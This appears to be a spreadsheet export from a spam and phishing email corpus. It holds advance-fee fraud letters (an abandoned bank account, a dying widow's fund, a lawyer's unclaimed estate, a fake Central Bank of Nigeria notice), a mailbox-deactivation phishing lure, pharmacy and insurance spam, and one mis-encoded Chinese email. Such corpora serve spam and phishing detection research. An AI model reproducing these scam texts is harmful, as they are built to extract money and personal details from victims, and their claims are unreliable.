    <t>FROM THE DESK OF  MR ALHJI IMAM.\nBANK OF AFRICA [BOA]\nOUAGADOUGOU, BURKINA FASO.\nalhji_imam2007@yahoo.fr\n\n\n\n\nDear friend,                                 TOP  SECRET\n\nCompliments, i am MR ALHJI IMAM.\nI am the manager of bill and exchange at the foreign remittance department \nof BANK OF AFRICA.\nI am writing to seek your cooperation over this business deal.\n\nIn my department, I discovered an abandoned sum of$30million USD(THIRTY \nmillion US dollars)only , in an account that belongs to one of our foreign \ncustomers who died along with his entire family in a plane crash that took \nplace in Kenya, East Africa, the Late DR. GEORGE BRUMLEY, a citizen of \nAtlanta, United  States of America but naturalised in Burkina Faso, West \nAfrica and contractor with\nECOWAS,(ECONOMIC COMMUNITY OF WEST AFRICAN STATES) .\nSince we got information about his death, we have been expecting his next of\nkin to come over and claim his money because it cannot be released unless\nsomebody  applies for it as next of kin or relation to the deceased as \nindicated in\nour banking guidelines but unfortunately , all his supposed next of kin or\nrelation died alongside with him at the plane crash leaving nobody behind \nfor the\nclaim. It is therefore upon this discovery that I now decided to make this\nbusiness proposal to you and release the money to you via your foreign bank\naccount as the next of kin or relation to the deceased for safety and \nsubsequent\ndisbursement since nobody is coming for it and this money Could go into the \nBank\ntreasury as unclaimed Bill.\nThe Banking law and guideline here stipulates that if such money\nRemained unclaimed after four years, the money will be transferred into the \nBank\ntreasury as unclaimed fund. The request for your assistance and maximum\nco-operation as a foreign citizen to stand as the next of kin in this \nbusiness\nis occasioned by the fact that the deceased customer was a foreigner and a\nBurkinabe cannot stand as next of kin to a foreigner.\n40 % of this money will be for you as my foreign partner, in respect to the\nprovision of a foreign account. 10 %will be set aside for expenses in cured \nduring\nthe business and 50 % would be for me. There after I will come over to your \ncountry\nfor disbursement according to the percentages indicated.\nTherefore to enable the immediate transfer of this fund to you as\narranged, you must apply first to the bank as the relation or next of kin to \nthe\ndeceased, indicating your claims and wherein the money will be remitted .\nUpon receipt of your reply, I will send to you by fax or email the text of\napplication which you will fill and submit to the office of the foreign \nremittance\ndirector of the bank of Africa. I will not fail to bring to your notice that \nthis\ntransaction is strictly confidential and i will use my position in this Bank \nto\neffect a hitch free transfer of the fund.\nYou should contact me immediately as soon as you receive this letter.\nTrusting to hear from you immediately.\nPlease , visit the website below for more informations about the Plane\nCrash and the tragic death of the deceased and his entire family, Late DR. \nGEORGE\nBRUMLEY.\n[URL]http://www.cnn.com[/URL]\nYours faithfully,\nMR ALHJI IMAM.\nNB :please reply me back by my this e-mail address alhji_imam2007@yahoo.fr\n\n_________________________________________________________________\nTen :  Messenger en illimit sur votre mobile !  \n[URL]http://mobile.live.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.cnn.com http://mobile.live.fr</t>
  </si>
  <si>
    <t>1174</t>
  </si>
  <si>
    <t>To: nan\nFrom: ruthmartinez &lt;ruth4martinez@netscape.net&gt;\nDate: Thu, 10 Mar 2005 15:15:34 +0100</t>
  </si>
  <si>
    <t>Thu, 10 Mar 2005 15:15:34 +0100</t>
  </si>
  <si>
    <t>ruthmartinez &lt;ruth4martinez@netscape.net&gt;</t>
  </si>
  <si>
    <t>From: Mrs.Ruthanne Ruby Martinez, Mutual Trust</t>
  </si>
  <si>
    <t>From: Mrs.Ruthanne Ruby Martinez, Mutual Trust Blessings to you. I am the above named person but now undergoing medical treatment now. I am married to Dr.Waltner De Matinez who worked with angolan embassy in mexico for over nine years before he died in the year 2002. We were married for eleven years without a child. He died after a brief illness that lasted for only four days. Before his death we were both born again Christians.Since his death I decided not to re-marry or get a child outside my matrimonial home which the Bible is against.When my late husband was alive he deposited the sum of$27.6Million (twenty-seven million six hundred thousand U.S. Dollars) with one finance/security company in Europe. Presently, this money is still with the Security Company. Recently, my Doctor told me that I would not last for the next three months due to cancer problem. Though what disturbs me most is my stroke. Having known my condition I decided to donate this fund to church or better still a christian individual that will utilize this money the way I am going to instruct here in. I want a church or individual to that will use this to fund churches, orphanages and widows propagating the word of God and to ensure that the house of the lord is maintained. The Bible made us to understand that Blessed is the hand that giveth. I took this decision because I don`t have any child that will inherit this money and my husband relatives are not Christians and I don`t want my husbands hard earned money to be misused by unbelievers. I dont want a situation where this money will be used in an ungodly manner, hence the reason for taking this bold decision. I am not afraid of death hence I know  where I am going. I know that I am going to be in the bossom of the Lord. Exodus 14 VS 14 says that the lord will fight my case and I shall hold my peace. I dont need any telephone communication in this regard because of my health,and because of the presence of my husbands relatives around me always. I dont want them to know about this development. With God all things are possible. As soon as I receive your reply I shall give you the contact of the  Finance/Security Company Europe. I will also issue you a letter of authority that will empower you as the original- beneficiary of this fund. I want you and the church to always pray for me because the lord is my shephard. My happiness is that I lived a life of a worthy Christian. Whoever that wants to serve the Lord must serve him in spirit and truth. Please always be prayerful all through your life. Any delay in your reply will give me room in sourcing for a church or christian individual for this same purpose. Please assure me that you will act accordingly as I stated herein. Hoping to hear from you. please reply me through my private email; Remain blessed in the name of the Lord. Mrs Ruthanne Ruby Martinez. ___________________________________________________________________________ Mail sent from WebMail service at PHP-Nuke Powered Site - [URL]http://yoursite.com[/URL]</t>
  </si>
  <si>
    <t>To: nan\nFrom: mark100414 &lt;mark100414@teenmail.co.za&gt;\nDate: Thu, 10 Mar 2005 05:22:38 -0600</t>
  </si>
  <si>
    <t>Thu, 10 Mar 2005 05:22:38 -0600</t>
  </si>
  <si>
    <t>mark100414 &lt;mark100414@teenmail.co.za&gt;</t>
  </si>
  <si>
    <t>Please kindly assist</t>
  </si>
  <si>
    <t>\nHello,\n\nIt may come to you as a surprise hearing from me, but\nto be precise I got your data from the your e-mail\nsite member directory in my search for a competent\nbusiness manager/hard working person who is willing\nand able to be my friend and partner, to liaise with\nme in order to\nexecute a project which I am convinced that you are\ncapable and trusted to do this business with me.\n\nI am Mark Luke, 32 years old and good looking man, and\nI am from  River State of Nigeria. I have B.SC in\nPublic Administration and I work with GLOBAL SECURITY\n&amp; FINANCE LTD. I  have now developed the interest in\nhaving a business investment outside Nigeria without\nmy employers knowing about it. Hence I contacted you\nfor friendship and business relationship.\n\nThe fund in question proposed for this project is\nUS$14.8million(Fourteen Million, Eight Hundred\nThousand Dollars Only), which I will like you to\nreceive it on my behalf and to invest it in your\nbusiness or in any business that you think will be\nprofitable in your country.\n\nPlease Note: This fund have been under a suspense\naccount pending the time it will be claimed by the\nowner. It came as a result of a multi-natinal company\nthat we helped to secure an oil drilling contract some\nyears ago and after the contract, the company got paid\nand went back to their country leaving behind this\nover-inflated sum for me and my colleagues to claim.\n\nNow the time has come for me to process and move the\nfund out for investment, but I can not do it on my own\nsince I am still working with the Global Security &amp;\nFinanace Ltd. This is why I need your help so that I\ncan use you or your company to process the release of\nthe fund as if you are reciving a payment of an\nexecuted contract.\n\nPlease let me know about yourself/company and also let\nme know if you can be able to receive the money on my\nbehalf and invest it in your company or any good and\nprofitable business in your country without exposing\nme, so as to give you all the details needed to make\nthe money transferred to you. \n\nYour share will be 40% for your assistance, while I\nwill take 55% and 5% will take care of any expenses\nthat will be incurred in the cause of transfer.\n\nPlease write back if only you know you are capable\nenough to execute this project with me.\n\nPlease this transaction requires utmost\nconfidentiality. My alternative Private email address\nis: markluke2@bareed.com           \n  \nLooking forward to your cooperation.\n\nYours faithfully,\nMark Luke\n\n\n\n___________________________________________________________________________\n   - [URL]http://www.almarefa.net[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://www.almarefa.net</t>
  </si>
  <si>
    <t>To: &lt;jose@monkey.org&gt;\nFrom: "Email Service" &lt;info@sketchstwenty3.com&gt;\nDate: Thu, 10 Feb 2022 08:15:10 +0000</t>
  </si>
  <si>
    <t>Thu, 10 Feb 2022 08:15:10 +0000</t>
  </si>
  <si>
    <t>"Email Service" &lt;info@sketchstwenty3.com&gt;</t>
  </si>
  <si>
    <t>Mailbox Deactivation Noticy 2/10/2022</t>
  </si>
  <si>
    <t>您好! 您的邮箱账号：jose@monkey.org，将在以下时间终止。 12:15 AM Thursday, February 10, 2022（中国标准时间） 注意： 请指出您是否仍在使用此邮箱。  我仍在使用我的邮箱 [URL]https://google.com[/URL] 请终止我的邮箱 [URL]https://google.com[/URL] 邮箱系统 Mailbox Deactivation Noticy 2/10/2022    Dear jose@monkey.org  Our record indicates that you recently made a request to deactivate email And this request will be processed shortly.If this request was made accidentally and you have no knowledge of it, you are advised to cancel the request now Cancel De-activation      However, if you do not cancel this request, the your account will be de-activated shortlyand all your email data will be lost permanently.Regards.Email Administrator</t>
  </si>
  <si>
    <t>https://google.com https://google.com</t>
  </si>
  <si>
    <t>1127</t>
  </si>
  <si>
    <t>To: researchers-owner@krusty.si.UM\nFrom: researchers-owner@krusty.si.UM\nDate: Thu, 10 Feb 2005 17:59:02 -0500</t>
  </si>
  <si>
    <t>Thu, 10 Feb 2005 17:59:02 -0500</t>
  </si>
  <si>
    <t>Researchers post from abacha_abj@mycommail.com requires approval</t>
  </si>
  <si>
    <t>As list administrator, your authorization is requested for the\nfollowing mailing list posting:\n\n    List:    Researchers@lists.si.UM\n    From:    abacha_abj@mycommail.com\n    Subject: request\n    Reason:  Post by non-member to a members-only list\n\nAt your convenience, visit:\n\n    [URL]http://lists.si.UM[/URL]\n        \nto approve or deny the request.\n</t>
  </si>
  <si>
    <t>5652</t>
  </si>
  <si>
    <t>To: houxllpbso@saverighthere.com\nFrom: bestrate@igo7.saverighthere.com\nDate: Thu, 1 Aug 2002 22:00:37 -0400</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 22:00:37 -0400</t>
  </si>
  <si>
    <t>bestrate@igo7.saverighthere.com</t>
  </si>
  <si>
    <t>houxllpbso@saverighthere.com</t>
  </si>
  <si>
    <t>ADV: Lowest life insurance rates available!                                                   acedl</t>
  </si>
  <si>
    <t>Lowest rates available for term life insurance! Take a moment and fill out our online form to see the low rate you qualify for. Save up to 70% from regular rates! Smokers accepted! [URL]http://www3.all-savings.com[/URL] \n      \nRepresenting quality nationwide carriers. Act now!\n     \n     \n     \n     \n     \n---------------------------------------\nTo unsubscribe, go to: \n[URL]http://www3.all-savings.com[/URL]\nPlease allow 48-72 hours for removal.</t>
  </si>
  <si>
    <t>5653</t>
  </si>
  <si>
    <t>To: yyyy@netnoteinc.com\nFrom: "Dr. Lee MD." &lt;arah.lee@www.com&gt;\nDate: Thu, 1 Aug 2002 20:56:02 -0700</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 20:56:02 -0700</t>
  </si>
  <si>
    <t>"Dr. Lee MD." &lt;arah.lee@www.com&gt;</t>
  </si>
  <si>
    <t>Fw: Re: royalmeds.com To: yyyy@netnoteinc.com OfferID: qpag</t>
  </si>
  <si>
    <t>\n\nRoyal _Meds_ _.com_ _  \nyour online pharmacy _[URL]www.royalmeds.com[/URL]\n\n&gt; We offer the Absolute Lowest prices on FDA-approved medications.\n\n&gt; Medication prescribed by _**licensed U.S. Physicians**_ and shipped via\n&gt; FedEx overnight delivery.\n\n&gt; Free Medical Consultation Available 24 hours... 7 Days a week!\n\n&gt; No Physical Exam Necessary.\n\n&gt; Featured Products include:\n\n  * WEIGHT LOSS: **MERIDIA, PHENTERMINE** and **XENICAL**\n  * SEXUAL: **VIAGRA**\n  * SKIN CARE: **RENOVA** and **RETIN-A**\n  * STOP SMOKING: **ZYBAN**\n  * HAIR LOSS: **PROPECIA**\n  * HERPES: **VALTREX** and **FAMVIR**\n  * PAIN RELIEF: **CELEBREX** and **CLARITIN**\n\n**_Click here to see how_ Royal _Meds.com can help you_**\n\n[URL]http://www.royalmeds.com[/URL]\n\n  \n\n\n\n\n\n\n\n\n\n\n\n **Unsubscribe Information:**  \nThis email is intended to be a benefit to the recipient. If you would like to\nopt-out and not receive any more marketing information please click here .\nYour address will be removed within 24hrs. We sincerely apologize for any\ninconvenience. jiocdhkevgjeftbjegpaerthqftuuiofljey\n\n</t>
  </si>
  <si>
    <t>www.royalmeds.com http://www.royalmeds.com</t>
  </si>
  <si>
    <t>5648</t>
  </si>
  <si>
    <t>To: &lt;yyyy@spamassassin.taint.org&gt;\nFrom: "IQ - First Penn" &lt;fp@insurancemail.net&gt;\nDate: Thu, 1 Aug 2002 18:58:07 -0400</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 18:58:07 -0400</t>
  </si>
  <si>
    <t>"IQ - First Penn" &lt;fp@insurancemail.net&gt;</t>
  </si>
  <si>
    <t>We are Slashing our Term Rates!</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------=_NextPart_000_1D01C9_01C23978.C008DBE0 Content-Type: text/plain; 	charset="Windows-1252" Content-Transfer-Encoding: 7bit  Preferred best and preferred non-tobacco rates  slashed on face amounts of $250,000 or more!      GTO 20 Preferred Best NT Guaranteed Level Term Annual Premiums ? Face Amounts ? 	 Issue Age	 $250,000	 $500,000	 $1 Million	  Male	 Female	 Male	 Female	 Male	 Female	  30	 $168	 $143	 $285	 $235	 $510	 $410	  40	 $225	 $190	 $400	 $330	 $710	 $590	  50	 $575	 $393	 $1,100	 $735	 $2,120	 $1,410	   	    GTO 20 Preferred NT Guaranteed Level Term Annual Premiums ? Face Amounts ? 	 Issue Age	 $250,000	 $500,000	 $1 Million	  Male	 Female	 Male	 Female	 Male	 Female	  30	 $213	 $175	 $375	 $300	 $630	 $520	  40	 $273	 $238	 $495	 $425	 $920	 $780	  50	 $663	 $470	 $1,275	 $890	 $2,460	 $1,670	   	 Call Us Today!  800-550-2666 x134 ? or ?  Please fill out the form below for more information	  Name:	  	 E-mail:	  	 Phone:	  	 City:	  	State:	  	 	 Zip:	             Appointed to Sell GTO?  Yes   No  	  	  	 	   	      First Penn-Pacific Life Insurance Company   GTO guaranteed level premium term life insurance issued by First Penn-Pacific Life Insurance Company, Schaumburg, IL. Premiums are current as of 7/22/02, rounded to the next dollar, subject to change, and include $50 non-commissionable policy fee. Products and features subject to state availability. In Montana, male premiums apply. Policy Form BT-1000 Series. Lincoln Financial Group is the marketing name for Lincoln National Corporation and its affiliates.  F02-1073-LT. For Agent Or Broker Use Only. Not To Be Used With The General Public.  We don't want anyone to receive our mailings who does not wish to. This is professional communication sent to insurance professionals. To be removed from this mailing list, DO NOT REPLY to this message. Instead, go here: [URL]http://www.Insurancemail.net[/URL]   Legal Notice    ------=_NextPart_000_1D01C9_01C23978.C008DBE0 Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable We are Slashing our Term Rates! =20 =20      =20        =20            =20              =20                 =20                    =20                                                GTO 20 Preferred Best NT Guaranteed Level Term = Annual Premiums — Face Amounts = — =20                       IssueAge $250,000 $500,000 $1 = Million =20                       Male Female Male Female Male Female =20                       30 $168 $143 $285 $235 $510 $410 =20                       40 $225 $190 $400 $330 $710 $590 =20                       50 $575 $393 $1,100 $735 $2,120 $1,410 =20                                     =20            =20                                                GTO 20 Preferred NT Guaranteed Level Term Annual = Premiums — Face Amounts = — =20                 IssueAge $250,000 $500,000 $1 = Million =20                 Male Female Male Female Male Female =20                 30 $213 $175 $375 $300 $630 $520 =20                 40 $273 $238 $495 $425 $920 $780 =20                 50 $663 $470 $1,275 $890 $2,460 $1,670 =20                  							=09            =20           Call Us Today!             — or —  =20                  =20                      =20                         Please fill = out the form below for more information =20                         Name: =20                            =20                         E-mail: =20                            =20                         Phone: =20                            =20                         City: =20                            State: =20                            =20                         Zip:  =20                                                      =            Appo= inted to Sell GTO?  Yes=20                                                       No=20                            =20                           =20                              =20                                         =20            =20            GTO=20               guaranteed level premium term life insurance issued by = First Penn-Pacific=20               Life Insurance Company, Schaumburg, IL. Premiums are = current as=20               of 7/22/02, rounded to the next dollar, subject to change, = and include=20               $50 non-commissionable policy fee. Products and features = subject=20               to state availability. In Montana, male premiums apply. = Policy Form=20               BT-1000 Series. Lincoln Financial Group is the marketing = name for=20               Lincoln National Corporation and its affiliates.                F02-1073-LT. For Agent Or Broker Use Only. Not To Be Used = With The=20               General Public.  =20     =20        We = don't want anyone=20         to receive our mailings who does not wish to. This is = professional communication=20         sent to insurance professionals. To be removed from this mailing = list,=20         DO NOT REPLY to this message. Instead, go here: =20         [URL]http://www.Insurancemail.net[/URL] Legal Notice=20 =20 ------=_NextPart_000_1D01C9_01C23978.C008DBE0--</t>
  </si>
  <si>
    <t>5636</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: "gu@163.com" &lt;gu@163.com&gt;\nDate: Thu, 1 Aug 2002 07:01:48 +0800</t>
  </si>
  <si>
    <t>Thu, 1 Aug 2002 07:01:48 +0800</t>
  </si>
  <si>
    <t>"gu@163.com" &lt;gu@163.com&gt;</t>
  </si>
  <si>
    <t>=?GB2312?B?uOW8/qO60rDC+cWu09FWU6G2xKe57dOi0++htw==?=</t>
  </si>
  <si>
    <t>°_x0004_n_x0001_VS'_x0001_â_x0004_wø 101¼_x0001_'_x0001_â_x0004_wø 9_x0004_¼_x0001_'_x0001_â_x0004_wø  (FLASH)8_x0001_»_x0004_ °_x0004_n_x0001_ò_x0003_9_x0004_ °_x0004_n_x0001_ò_x0003_ e±_x0002_r_x0003_?_x0004_ Flash¼_x0005_&amp;'_x0001_â_x0004_wø Flash¼_x0005_"·_x0002_ÿ_x0001_®_x0005_»_x0005_" '_x0001_â_x0004_wø"g_x0004_èý ñ"²_x0004_?_x0007_â_x0004_-_x0005_ph¬_x0001_           }_x0005_g_x0004_'_x0001_â_x0004_wø ===================================== Flash¼_x0005_"·_x0002_ÿ_x0001_®_x0005_»_x0005_" Flash¼_x0005_ ;_x0004_¿_x0005_w(Flashìhá_x0001_;_x0004_¿_x0005_w(°~lõ_x0003_9_x0004_-_x0004_1_x0005_º_x0003_:_x0002_±_x0002_®_x0002_ì¨¾_x0002_´_x0007_u_x0002_»_x0004_ó_x0005_8_x0001_;_x0005_¿_x0005_ì(ª_x0003_·_x0002_ÿ_x0001_®_x0005_»_x0005_qh ³_x0001_!_x0001_Flash¼_x0005_¼1000ç_x0001_TRUETYPEc_x0003_?_x0001_ð_x0001_+_x0002_{_x0003_¡_x0001_ç_x0001_á_x0005_t_x0003_5_x0006_»_x0005_5_x0001_¿_x0005_ì(²_x0004_¨_x0003_»_x0004_9_x0007_i_x001E_ç_x0001_ü_x0005_8_x0001_;_x0005_õ_x0003_s_x0003_½_x0001_(_x0003_á_x0001_e±_x0002_y_x0005_a_x0004_½_x0001_(_x0003_ ³_x0006_®_x0002_7_x0004_5_x0003_#_x0004_9_x0004_&lt;_x0006_1_x0005_÷_x0002_c_x0004_»_x0004_õ_x0003_s_x0003_g_x0004_:_x0001_,_x0003_&gt;_x0004_á_x0006_g_x0004_#_x0001_|_x0003_µ_x0002_÷+_x0002_ø_x0005_u_x0003_:_x0001_,_x0003_ª_x0005_¶_x0002_ì(600G?_x0001_ð_x0001_+_x0002_:_x0001_,_x0003_ª_x0005_¶_x0002_c(  µ_x0004_ª_x0004_ã_x0003_s_x0003_ì(ª_x0004_¿4_x0004_|_x0003_a_x0003_  ;_x0004_¿_x0005_w(i_x001E_ô_x0002_-_x0005_-_x0005_"¿4_x0004_"""úxbXy_x0005_bX½_x0005_bX&gt;_x0001_bX¯_x0002_á_x0004_bXbXo_x0003_bXbXn_x0007_bXbX5_x0002_!_x0002_k~þ_x0002_µ_x0004_è_x0005_µ_x0004_¦_x0002_a_x0004_;_x0005_½_x0001_(_x0003_½_x0001_(_x0003_  ?_x0001_ð_x0001_3_x0004_~_x0004_·_x0001_truetypeu_x0003_#_x0004_90%õ_x0003_a_x0002_;_x0004_¿_x0005_w(i_x001E_+_x0002_-_x0005_-_x0005_c_x0003_+_x0002_ª_x0005_¶_x0002_(_x0002_   =====================================    '_x0001_â_x0004_wø '_x0001_â_x0004_wø,-_x0005_!_x0004_{_x0003_â_x0004_qøâ_x0004_½_x0001_!_x0004_eEnglish»_x0004_â_x0005_µ_x0002_'_x0004_â_x0004_¿_x0007_³_x0003_!_x0003_ '_x0001_â_x0004_wø"g_x0004_èý ñ"g_x0004_5_x0006_ì8s_x0003_²_x0004_?_x0007_â_x0004_-_x0005_ph¬_x0001_ÿ_x0001_'_x0004_#_x0007_x_x0004_s_x0006_ª_x0003_½_x0002_â_x0004_&lt;ÿg_x0004_ð_x0003_a_x0004_5_x0007_1019_x0004_9_x0001_l_x0003_¼_x0001_   '_x0001_â_x0004_wøg_x0004_ð_x0003_ÿ_x0001_:_x0002_g_x0004_ð_x0003_'_x0004_h_x0003_â_x0004_2_x0003_5_x0001_?_x0001_ð_x0001_'_x0001_ â_x0004_wø~_x0004_ñ_x0007_2000Më_x0002_6_x0001_ú_x0003_}_x0003_50!_x0004_±_x0002_MP32_x0003_. ã_x0003_¡~_x0005_ ===================================== =   =  ~_x0005_ú8[URL]http://www.eChinaEdu.com[/URL] =  ~_x0005_ú8[URL]http://www.eChinaEdu.vicp.net[/URL] =  3_x0003_~_x0005_ú8[URL]http://qlong2008.xilubbs.com[/URL] =   ===================================== [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.eChinaEdu.com http://www.eChinaEdu.vicp.net http://qlong2008.xilubbs.com http://xent.com</t>
  </si>
  <si>
    <t>892</t>
  </si>
  <si>
    <t>To: R@M\nFrom: Mike Morgan &lt;mikemorgant@netscape.net&gt;\nDate: Thu, 09 Sep 2004 20:51:57 +0100</t>
  </si>
  <si>
    <t>Thu, 09 Sep 2004 20:51:57 +0100</t>
  </si>
  <si>
    <t>Mike Morgan &lt;mikemorgant@netscape.net&gt;</t>
  </si>
  <si>
    <t>From Morgan</t>
  </si>
  <si>
    <t xml:space="preserve">  \nGood day Sir,\n\nI am Mike Morgan Tsvangirai, A 19 year Son of Mr.Morgan Tsvangirai Jr the opposition leader to President Robert Mugabe of Zimbabwe.\n\nFollowing his ugly land reform exercise, taking over of white farmers land and redistributing it to the Blacks that set the country on the brinks of collapse and the call by international nations including the United Nation for his resignation, my father is a strong party against the decision of President Robert Mugabe.\n\nPresident Robert Mugabe is treating to kill my father in order to reduce opposition because of his decision. Because of President Mugabe's death treat to my father, my father was able to move us out of Zimbabwe to Democratic republic of Congo for safety and further Education. President Robert Mugabe's government has set up secret camps across the country in which thousands of youths are taught how to torture and kill. You can read more concerning President Roberts Mugube bad manner at; [URL]http://news.bbc.co.uk[/URL]\n\nBefore my father�s Death, he further told me that he left the sum of $10,500,000.00 United States Dollars for myself and the family in a payment Finance House in London if anything happens to him, base on the fact that we must use the fund for investment as long as we provide the person who will invest on this fund before the Finance house can release the fund.\n\nI will like you to know that I have all the certificate of deposit, which my father gave me concerning the fund. And I have contacted you to present you as the investor. Do get back to me with your full contact information so that I will give you more information on this project.Please contact me on my private email: mikemorgant28@netscape.net\n\nThanks,\n\nMike Morgan\n\n(On behalf of the family)\n\n\n\n\n</t>
  </si>
  <si>
    <t>2691</t>
  </si>
  <si>
    <t>To: R@M\nFrom: Mr.Paul BENSON &lt;goodfaith119611@yahoo.com.hk&gt;\nDate: Thu, 09 Nov 2006 12:52:06 -0500</t>
  </si>
  <si>
    <t>Thu, 09 Nov 2006 12:52:06 -0500</t>
  </si>
  <si>
    <t>Mr.Paul BENSON &lt;goodfaith119611@yahoo.com.hk&gt;</t>
  </si>
  <si>
    <t>GOOD FAITH</t>
  </si>
  <si>
    <t>From: Paul BENSON\nDate: 09/11/2006\n\nDear friend,\n\nMy name is Barrister Paul BENSON the attorney of late Thompson Morris a\nCitizen of United States of America who deposited the sum of\n$4.8million US Dollars cash in a DIPLOMATIC SECURITY COMPANY in Europe\nI Requested for the release of his funds few months ago before i fell\nSick and also to be transfer to any of his family member/cousin or\nRelation which will be you.\n\nThe problem that am having at the moment is getting a reliable and\ntrusted person that will forward   his contact and also\nhis full name and Identification then i will proceed by Sending a POWER\nof ATTORNEY to him and a release letter that will direct the Diplomatic\nSecurity Company to deliver the funds to you either by cash or by Bank\nTransfer due to the fact that the funds are deposited in cash. I have\nall the documents that prove that the money is not a DRUG money and\nalso CERTIFICATE OF ANTI-TERRORISE and MONEY LAUDERING.\nIf you can play the role by sending me your details such as follow:\n\nFull Name:\nContact Address:\nPhone Number:\nAny Form of ID:\n\nI believe it will be wise enough for us to claim the funds instead of\nLeaving it for some group of staffs to share it within them self. The\nLate Mr. Thompson is an American, but he died together with his wife\nand their only daughter on board Alaska Airline flight number 261, on\n31st of January 2000. You can read more about Mr. Morris Thompson and\nhis family's death by clicking on this:\n\n[URL]http://www.cnn.com[/URL]\n\nMr. Paul BENSON\nNB. I have been seriously sick all this while and presently in a\nHospital herein Europe so i am not sure of making it in life do to my\nhealth problem.\n\n\n\n\n\n\n\n\n</t>
  </si>
  <si>
    <t>1767</t>
  </si>
  <si>
    <t>To: nan\nFrom: Michel Houssou &lt;michel.07@free.fr&gt;\nDate: Thu, 09 Feb 2006 19:07:02 +0100</t>
  </si>
  <si>
    <t>Thu, 09 Feb 2006 19:07:02 +0100</t>
  </si>
  <si>
    <t>Michel Houssou &lt;michel.07@free.fr&gt;</t>
  </si>
  <si>
    <t>INVESTMENT PLAN.</t>
  </si>
  <si>
    <t>BARRISTER MICHEL HOUSSOU,\n04 BP 134 COTONOU BENIN RP\nTEL:+229-95453467\nEmail:michel.houssou@caramail.com\n\nDear Friend,\n\nI am Michel Houssou,Attorney to Mr.Adnan Mohammad a Lebanese Investor/Gold\nmerchant who died in the plane crash of Union Transport Africaines Flight\nBoeing 727 in Cotonou, Benin Republic on December 25, 2003\nYou will read more stories about the crash on visiting this website.\n[URL]www.cnn.com[/URL]\n\nBefore his untimely death on the 25Th December 2003, Mr.Adnan Mohammad has a\nhuge amount of money deposit in a Security Company in Republic of Ghana,\nMr.Mohammad has in mind to use the money to invest in a gold business in Ghana\nbefore his sudden death.\n\nLast week his wife Mrs.Nadia Mohammad and his younger brother Ali instructed me\nto look for a reliable foreign partner who will assist us to invest the money\nin his country,\n\nI contacted you to assist us in moving the fund from the Security Company in\nGhana to his country for proper investment.and we would like you to invest the\nmoney any profitable venture you may suggest.\n\nI seek your consent to present you as our foreign partner so that the proceeds\nof the amount valued at US$18.5 Million will be arrange and transfer to your\naccount for investment purpose.\n\nI guarantee that this transaction will be executed under a legitimate\narrangement that will protect you from any breach of the law\n\nAll I require from you is your co-operation, honesty, trust and confidentiality\nto enable us see this transaction through.we agreed to compensate you on a\nmutually agreed percentage.\n\nOnce you agreed to my proposal and ready to assist us to invest this money\nwisely in your country, I will send to you the Certificate of Deposit which was\nissued to Mr.Adnan Mohammad when the fund was deposited in June 2003.\n\nAs soon as we hear from you I will travel to Ghana to meet the Directors of the\nSecurity Company to discussed on how the fund will be transfer to your place.\nPlease call me immediately you receive this mail on my direct\nline:00229-95453467\n\nYou can as well contact me on my private email-\naddress:michel.houssou@caramail.com\nAwaiting your urgent response\n\nMy best regards\n\nMichel Houssou\n\n\n\n</t>
  </si>
  <si>
    <t>3263</t>
  </si>
  <si>
    <t>To: nan\nFrom: Prof.Charles.C.Soludo &lt;cbnpayment.org@host45.porar.com&gt;\nDate: Thu, 09 Aug 2007 15:21:29 +0700</t>
  </si>
  <si>
    <t>Thu, 09 Aug 2007 15:21:29 +0700</t>
  </si>
  <si>
    <t>Prof.Charles.C.Soludo &lt;cbnpayment.org@host45.porar.com&gt;</t>
  </si>
  <si>
    <t>RE:CHANGE OF ACCOUNT PARTICULARS ON YOUR BENEFICIARY FILE</t>
  </si>
  <si>
    <t>\nCENTRAL BANK OF NIGERIA \nINTERNATIONAL REMITTANCE DEPARTMENT \nCORPORATE HEAD QUARTERS.\nTINUBU SQUARE,LAGOS. \nOUR REF: CBN/IRD/CBX/021/07 \n\nWEBSITE: [URL]www.cenbank.org[/URL]\n\n\n\nRE:CHANGE OF ACCOUNT PARTICULARS ON YOUR BENEFICIARY FILE \n\n\nDear Sir/Madam \n\nI hereby send to you the information submitted by Mr. John Tsai of Indo-China group Ltd, with an application to receive the payment on your behalf. Please as a matter of urgency, you are required to verify the following information and inform us if you are aware or know anything about this. \n\n\n1. Did you instruct one Mr. John Tsai of Indo-China group Ltd. Hong-Kong, whose information's is below, to claim and receive the payment on your behalf ? \n\n\n2. Did you sign any "Deed of Assignment" in his favor thereby making him the current beneficiary with the following account details: Account Name: Indo-China Group Ltd, A/C #USD114-1025567-8, Bank Name: Standard Chattered Bank,Hong Kong, Swift Code: SCBL11K111. \n\nFinally,  You are hereby advised to indicate to this honorable office with immediate effect, if you are the person that instructed Mr. John Tsai to come for the claim of these funds, to enable me endorse for the final payment approval order on his behalf. You are to call the Phone Number for more clarifications. \n\nWe wait to hear from you soonest, and be rest assured of our professional service. Protect your funds by replying to this e-mail address for confidential reason so that John Tsai will not take possession of your funds.\n\nProf.Charles.C.Soludo \n\nExecutive Governor Central Bank of Nigeria. \n\n\n\n\n\n\n</t>
  </si>
  <si>
    <t>www.cenbank.org</t>
  </si>
  <si>
    <t>2949</t>
  </si>
  <si>
    <t>To: nan\nFrom: ahmed hassana &lt;ahmed_hassana031@hotmail.com&gt;\nDate: Thu, 08 Mar 2007 14:03:46 +0000</t>
  </si>
  <si>
    <t>Thu, 08 Mar 2007 14:03:46 +0000</t>
  </si>
  <si>
    <t>ahmed hassana &lt;ahmed_hassana031@hotmail.com&gt;</t>
  </si>
  <si>
    <t>WAITING FOR YOUR RESPONSE</t>
  </si>
  <si>
